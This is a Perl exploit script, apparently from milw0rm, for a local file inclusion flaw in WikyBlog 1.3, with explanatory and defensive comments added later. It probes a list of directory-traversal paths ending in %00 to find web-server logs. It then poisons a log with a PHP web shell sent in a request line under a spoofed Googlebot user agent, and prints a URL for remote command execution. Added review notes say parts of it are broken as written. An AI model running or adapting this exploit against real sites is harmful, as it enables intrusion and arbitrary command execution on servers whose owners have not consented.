#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                          WikyBlog Local File Inclusion Exploit                                #
#################################################################################################
# Software: WikyBlog 1.3                                                                        #
#                                                                                               #
# Vendor: http://www.wikyblog.com/                                                              #
#                                                                                               #
# Released: 2006/12/01                                                                          #
#                                                                                               #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)                                       #
#                                                                                               #
# Note: The information provided in this document is for WikyBlog administrator                 #
# testing purposes only!                                                                        #
#                                                                                               #
# This exploit makes use of a local file inclusion vulnerability in                             #
# WikyBlog to allow command execution. Firstly it locates an                                    #
# access_log, or error_log then it inserts a PHP Shell into                                     #
# the log file and returns a link for command execution.                                        #
#                                                                                               #
# include/WBmap.php?l=file_to_include%00                                                        #
# register_globals being on does not affect this vulnerability                                  #
#################################################################################################

use IO::Socket;
use Switch;

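# Script-wide settings: the TCP port to connect to and the two positional
# arguments (target host, web path of the install).  Declared with `our` so
# they stay package globals for the rest of the script, which runs without
# strict.  `$ARGV[0]` replaces the original one-element slice `@ARGV[0]`,
# which yields the same value but warns under `use warnings`.
our $port   = "80";       # connection port
our $target = $ARGV[0];   # host to connect to, e.g. localhost
our $folder = $ARGV[1];   # web path of the install, e.g. /wikyblog/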

# Print the r0ut3r banner to STDOUT.  Takes no arguments; the text lives in a
# single-quoted heredoc so nothing in it is interpolated.
sub Header()
{
        my $banner = <<'BANNER';
#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                          WikyBlog Local File Inclusion Exploit                                #
#################################################################################################
BANNER
        return print $banner;
}

# Print the invocation syntax and an example, then terminate the process.
# Never returns.
sub Usage()
{
        my $help = <<'HELP';
Usage: wikyblogxpl1.3.pl [target] [folder]
Example: wikyblogxpl1.3.pl localhost /wikyblog/
HELP
        print $help;
        exit;
}

# Show the banner, then refuse to continue unless both positional arguments
# (target host and web path) were supplied.
Header();
Usage() unless $target && $folder;

# log list taken from Kacper's http://www.milw0rm.com/exploits/2253
# Candidate web-server log locations, written relative to the include/
# directory of the WikyBlog install (one to five "../" levels).  Each is
# sent in turn as the l= value followed by %00; a burst of such requests
# is the pattern a web-log or WAF rule for this script would key on.
@paths=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

# Find a web-server log that the vulnerable include will serve back.  One
# fresh TCP connection per entry of @paths, each carrying a single GET for
# include/WBmap.php?l=<path>%00.  Seen from the target, this is a burst of
# directory-traversal requests ending in %00 with a User-Agent that claims
# to be Googlebot -- an easy web-log / WAF signature.
print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
        # Any connect failure aborts the whole run (die); it is not retried.
        $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
        # Hand-rolled HTTP/1.1 request.  Line ends are bare "\n" rather than
        # the CRLF HTTP specifies, and the header block is terminated with
        # "\n\n\r\n"; none of these prints is checked for errors.
        print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n";
        print $sock "Host: $target\n";
        print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
        print $sock "Accept: text/html\n";
        print $sock "Connection: close\n\n\r\n";

        #locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253
        # Read the whole response (status line, headers and body) until the
        # server closes the connection.
        $out = "";
        while ($answer = <$sock>) {
                $out.=$answer; }
        close($sock);
        # A hit is any response containing text bracketed by "_exppl_" markers.
        # NOTE(review): nothing sent by this file contains that marker, so the
        # check presumably depended on a step that is not present here.
        if ($out =~ m/_exppl_(.*?)_exppl_/ms) {
                print "[+] Log file found! [".$path."] \n";
                $log = $path; }   # the loop carries on, so $log ends as the LAST hit
}

# No candidate was served back: there is nothing to poison, so stop.
if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }

# Log poisoning.  The PHP snippet is sent as the request *path* of a GET to
# the site root, so a server that records request lines writes it into the
# log located above; including that log through WBmap.php?l= is what would
# then run it.  Defensively, a literal "<?php" in a request line is a strong
# poisoning indicator that is trivial to alert on.
print "[+] Inserting PHP Shell into logs\n";
# NOTE(review): $cmdfunct is never assigned anywhere in this file.
$code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
# Same hand-rolled request shape (and same unchecked prints) as the probe
# loop; the socket is never read from or closed explicitly.
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
print "[+] Sent code...\n";   # the response is never read or checked

# Only a URL is printed; the script never verifies that the log was actually
# poisoned or that the include now executes anything.
print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00";

# milw0rm.com [2006-12-01]